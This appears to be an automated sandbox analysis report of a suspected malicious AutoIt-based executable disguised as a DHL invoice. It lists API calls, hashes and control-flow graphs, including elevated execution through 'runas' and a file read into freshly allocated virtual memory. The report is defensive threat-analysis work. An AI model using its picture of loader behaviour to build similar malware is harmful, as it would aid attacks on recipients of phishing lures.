• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
• Instruction ID: 3ef04f97af142eeb93259d9b2add555444f35f51f00ca5425217e8decba28034
• Opcode Fuzzy Hash: 66416d8bd0581f03bdee432686227283083aff62fb32698c9a84c54625863c25
• Instruction Fuzzy Hash: FF115A70200700AFDB228BA6DC88F677BBDEBC6B51F158969F416D6650DB71EC008B20
APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
  • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
  • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,003F2224), ref: 00372C10
• ShellExecuteW.SHELL32(00000000,?,?,003F2224), ref: 00372C17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 105cb18b8c5c73cec769b0af6411387e9afcd2398f8f1a9fd229738e5d00ddc9
• Instruction ID: a3c28b5b15a01c791280222b21edfa5fd349a1956df03e86cc24d857c66d3143
• Opcode Fuzzy Hash: 105cb18b8c5c73cec769b0af6411387e9afcd2398f8f1a9fd229738e5d00ddc9
• Instruction Fuzzy Hash: 50118131208345AAC717FF60D8D2ABFB7A89B91351F44942DF1865B0B2CF759A49C712
APIs
• lstrlenW.KERNEL32(?,00375222), ref: 0039DBCE
• GetFileAttributesW.KERNELBASE(?), ref: 0039DBDD
• FindFirstFileW.KERNELBASE(?,?), ref: 0039DBEE
• FindClose.KERNEL32(00000000), ref: 0039DBFA
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
• Instruction ID: 5b66ef17c9aa3a1d7ebeb23661e918b28b261a40e82eddf5222d95b36d712c03
• Opcode Fuzzy Hash: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
• Instruction Fuzzy Hash: 9BF0A03082091057CA226B78EC0E8AA776C9E01334F144B02F83AC20E0EBB069558A95
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: p#@
• API String ID: 3964851224-1673889715
• Opcode ID: 667b214466669678dcfc3ef169db81c89e521154844d0a90ed36f50b8f9c592a
• Instruction ID: 1fafbfc7ce4f8d816448757dc00fd0adf153c54e1969fb25d0886eae310f89fb
• Opcode Fuzzy Hash: 667b214466669678dcfc3ef169db81c89e521154844d0a90ed36f50b8f9c592a
• Instruction Fuzzy Hash: 54A279706083418FC756DF28C4C0B2ABBE5BF89304F15996DE89A9B352D771EC45CB92
APIs
• GetInputState.USER32 ref: 0033D807
• timeGetTime.WINMM ref: 0033DA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB28
• TranslateMessage.USER32(?), ref: 0033DB7B
• DispatchMessageW.USER32(?), ref: 0033DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
• Sleep.KERNEL32(0000000A), ref: 0033DBB1
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: a23eff23e54f52d537576a6b46a57a9328ff51bc7cf2377bd27ff9ed448511ef
• Instruction ID: 79df7216a669ff6a6eb20735f1b3d2cec8a6e5b36a757ccad92f430fbb3ecb02
• Opcode Fuzzy Hash: a23eff23e54f52d537576a6b46a57a9328ff51bc7cf2377bd27ff9ed448511ef
• Instruction Fuzzy Hash: D942D070608341EFD72BDF24D884FAAB7E5BF86304F1585A9F4568B2A1D770E844CB92

Control-flow Graph

APIs
  • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
  • Part of subcall function 00333357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00333379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0033356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003731CE
• RegCloseKey.ADVAPI32(?), ref: 00373210
• _wcslen.LIBCMT ref: 00373277
• _wcslen.LIBCMT ref: 00373286
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$,
• API String ID: 98802146-1987284180
• Opcode ID: 454bcc716f1b054ca76c26da243897e721c9ffeba7b81ef4c1c19532dbe6f5f3
• Instruction ID: bad5da69b8f479994890d527d9a5898e3148165fe41895205e224268a54c6774
• Opcode Fuzzy Hash: 454bcc716f1b054ca76c26da243897e721c9ffeba7b81ef4c1c19532dbe6f5f3
• Instruction Fuzzy Hash: DF7191714043009EC316EF65DE8599BB7E8FF85340F40583EF949EB1A1DBB49A48CB55

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00332D07
• RegisterClassExW.USER32(00000030), ref: 00332D31
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
• InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
• LoadIconW.USER32(000000A9), ref: 00332D85
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
• Instruction ID: abee9cb7ef13f2bde5fce441c5f821bba2b0dc48bf862b4628ddfd8a34d079ad
• Opcode Fuzzy Hash: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
• Instruction Fuzzy Hash: EA21A0B5911218AFDB019FA4E949B9DBBB8FB08700F00512AEA15F62A0D7B15544CF95

Control-flow Graph

control_flow_graph 372 368d45-368d55 373 368d57-368d6a call 35f2c6 call 35f2d9 372->373 374 368d6f-368d71 372->374 388 3690f1 373->388 375 368d77-368d7d 374->375 376 3690d9-3690e6 call 35f2c6 call 35f2d9 374->376 375->376 380 368d83-368dae 375->380 394 3690ec call 3627ec 376->394 380->376 383 368db4-368dbd 380->383 386 368dd7-368dd9 383->386 387 368dbf-368dd2 call 35f2c6 call 35f2d9 383->387 391 3690d5-3690d7 386->391 392 368ddf-368de3 386->392 387->394 393 3690f4-3690f9 388->393 391->393 392->391 396 368de9-368ded 392->396 394->388 396->387 399 368def-368e06 396->399 400 368e23-368e2c 399->400 401 368e08-368e0b 399->401 405 368e2e-368e45 call 35f2c6 call 35f2d9 call 3627ec 400->405 406 368e4a-368e54 400->406 403 368e15-368e1e 401->403 404 368e0d-368e13 401->404 407 368ebf-368ed9 403->407 404->403 404->405 437 36900c 405->437 409 368e56-368e58 406->409 410 368e5b-368e79 call 363820 call 3629c8 * 2 406->410 412 368edf-368eef 407->412 413 368fad-368fb6 call 36f89b 407->413 409->410 441 368e96-368ebc call 369424 410->441 442 368e7b-368e91 call 35f2d9 call 35f2c6 410->442 412->413 417 368ef5-368ef7 412->417 426 368fb8-368fca 413->426 427 369029 413->427 417->413 422 368efd-368f23 417->422 422->413 423 368f29-368f3c 422->423 423->413 428 368f3e-368f40 423->428 426->427 432 368fcc-368fdb GetConsoleMode 426->432 430 36902d-369045 ReadFile 427->430 428->413 433 368f42-368f6d 428->433 435 369047-36904d 430->435 436 3690a1-3690ac GetLastError 430->436 432->427 438 368fdd-368fe1 432->438 433->413 440 368f6f-368f82 433->440 435->436 445 36904f 435->445 443 3690c5-3690c8 436->443 444 3690ae-3690c0 call 35f2d9 call 35f2c6 436->444 439 36900f-369019 call 3629c8 437->439 438->430 446 368fe3-368ffd ReadConsoleW 438->446 439->393 440->413 448 368f84-368f86 440->448 441->407 442->437 455 369005-36900b call 35f2a3 443->455 456 3690ce-3690d0 443->456 444->437 452 369052-369064 445->452 453 36901e-369027 446->453 454 368fff GetLastError 446->454 448->413 458 368f88-368fa8 448->458 452->439 462 369066-36906a 452->462 453->452 454->455 455->437 456->439 458->413 467 369083-36908e 462->467 468 36906c-36907c call 368a61 462->468 469 369090 call 368bb1 467->469 470 36909a-36909f call 3688a1 467->470 479 36907f-369081 468->479 477 369095-369098 469->477 470->477 477->479 479->439
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .5
                                                                                                                        • API String ID: 0-4279605997
                                                                                                                        • Opcode ID: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                                                                                                                        • Instruction ID: d5c903947fd9e1a93b36358c201cc5ba80de059ce4d2226aa7d400276af59efd
                                                                                                                        • Opcode Fuzzy Hash: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                                                                                                                        • Instruction Fuzzy Hash: A3C1F674D04249AFCF13DFA8D841BADBBB8AF0D310F05815AF815AB396CB719941CB61

                                                                                                                        Control-flow Graph

[Rendered control-flow graph (not reproduced as text). Function entry 0x37065b; API-calling basic blocks: GetLastError at 0x370756, GetFileType at 0x370781, GetLastError and CloseHandle at 0x37078c, CloseHandle at 0x3708fc, GetLastError at 0x370931; CreateFileW is reached through the subcall at 0x37039a.]
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0037039A: CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0037076F
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370776
                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00370782
                                                                                                                        • GetLastError.KERNEL32 ref: 0037078C
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370795
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003707B5
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003708FF
                                                                                                                        • GetLastError.KERNEL32 ref: 00370931
                                                                                                                        • __dosmaperr.LIBCMT ref: 00370938
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                                                                                                                        • Instruction ID: 8d460e997890fe5fb00a014edb5e071f0603a0f68850b1f0421615b5a415ce36
                                                                                                                        • Opcode Fuzzy Hash: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                                                                                                                        • Instruction Fuzzy Hash: 8DA12836A101448FDF2E9F68D851BAD7BA0EB06320F14815DF859EF2A1CB399812CB91

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00332B8E
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00332B9D
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00332BB3
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00332BC5
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00332BD7
                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00332BEF
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00332C40
                                                                                                                          • Part of subcall function 00332CD4: GetSysColorBrush.USER32(0000000F), ref: 00332D07
                                                                                                                          • Part of subcall function 00332CD4: RegisterClassExW.USER32(00000030), ref: 00332D31
                                                                                                                          • Part of subcall function 00332CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                                                                                                                          • Part of subcall function 00332CD4: InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                                                                                                                          • Part of subcall function 00332CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                                                                                                                          • Part of subcall function 00332CD4: LoadIconW.USER32(000000A9), ref: 00332D85
                                                                                                                          • Part of subcall function 00332CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                                                                                                                        • Instruction ID: 05f6c6458baa9414931b0625720bfe8fe44a216d83bb908bfe56fb9465286d96
                                                                                                                        • Opcode Fuzzy Hash: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                                                                                                                        • Instruction Fuzzy Hash: A9213974E10314AFEB119FA5EE85AA97FF8FB08B50F04002AF905B66B0D3B11540CF98

                                                                                                                        Control-flow Graph

[Rendered control-flow graph (not reproduced as text). Window procedure at 0x333170; API-calling basic blocks: DefWindowProcW at 0x3331d0, KillTimer at 0x333201, SetTimer and RegisterWindowMessageW at 0x33321d, CreatePopupMenu at 0x333246, PostQuitMessage at 0x333265, SetFocus at 0x372dc6, MoveWindow at 0x372dd7.]
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0033316A,?,?), ref: 003331D8
                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0033316A,?,?), ref: 00333204
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00333227
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0033316A,?,?), ref: 00333232
                                                                                                                        • CreatePopupMenu.USER32 ref: 00333246
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00333267
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                        • Opcode ID: 2b1d820ecbc0b495ee746997df2ee1f60f03504b98cfc280673e903667ece961
                                                                                                                        • Instruction ID: 084f7b5e9ee499d318918bc307d2bd6096fa448185630a604c94b4f376a00c80
                                                                                                                        • Opcode Fuzzy Hash: 2b1d820ecbc0b495ee746997df2ee1f60f03504b98cfc280673e903667ece961
                                                                                                                        • Instruction Fuzzy Hash: 04412831A50200ABEB272B78DE8DB7A365DE705340F04C135F91AEA5F1C779DA40D769
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D%@$D%@$D%@$D%@$D%@D%@$Variable must be of type 'Object'.
                                                                                                                        • API String ID: 0-3139565913
                                                                                                                        • Opcode ID: d045f8a9b090bf7fba90cf06b304379929541be4d3e9d43e125a8c7a68b75033
                                                                                                                        • Instruction ID: d7593252870f1e30f37c82007b4067dae0ad03437d1baf57de36024143c12fb1
                                                                                                                        • Opcode Fuzzy Hash: d045f8a9b090bf7fba90cf06b304379929541be4d3e9d43e125a8c7a68b75033
                                                                                                                        • Instruction Fuzzy Hash: C0C29875E00214CFCB26DFA8C8C0AADB7B1BF09710F258569E946AB3A1D375ED41CB91

                                                                                                                        Control-flow Graph

[Rendered control-flow graph (not reproduced as text). Function entry 0xeaf2d8 in the non-PE-backed region at 0xeac000; API-calling basic blocks: CreateFileW at 0xeaf38d, VirtualAlloc at 0xeaf3d1 and 0xeaf410, ReadFile at 0xeaf3f2, CloseHandle at 0xeaf4d8, VirtualFree at 0xeaf4e8 and 0xeaf5c4; the tail block at 0xeaf4f6 loops back to the CreateFileW block.]
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EAF3A9
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EAF5CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 204039940-0
                                                                                                                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                        • Instruction ID: 3b607deba843504abac0bd7b14106f4e8fac877621d2a701deed76a91a568b83
                                                                                                                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                        • Instruction Fuzzy Hash: 01A10570E00209EBDB14DFE4C898BEEBBB5BF49304F209169E515BB280D775AE41CB54

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                                                                                                                          • Part of subcall function 00331B4A: RegisterWindowMessageW.USER32(00000004,?,003312C4), ref: 00331BA2
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0033136A
                                                                                                                        • OleInitialize.OLE32 ref: 00331388
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 003724AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID: H$Xp$p
                                                                                                                        • API String ID: 1986988660-2519730203
                                                                                                                        • Opcode ID: 1c9ea5762798be36a71bd9bbe15f54bd1257441d650a33224ff9201e77ef3bd1
                                                                                                                        • Instruction ID: d5d620b313ddd8b131fc1bb3b8c1ab8039807e4c501568be2ab60fb1a230defb
                                                                                                                        • Opcode Fuzzy Hash: 1c9ea5762798be36a71bd9bbe15f54bd1257441d650a33224ff9201e77ef3bd1
                                                                                                                        • Instruction Fuzzy Hash: 9371BFB9911300AFC386EF79AE85A553AE4FB88354754863EE44AFB2B1EB344541CF4C

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph 1224: entry block 332c63-332cd3; API calls in graph: CreateWindowExW (x2), ShowWindow (x2)]
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00332C91
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00332CB2
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CC6
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CCF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
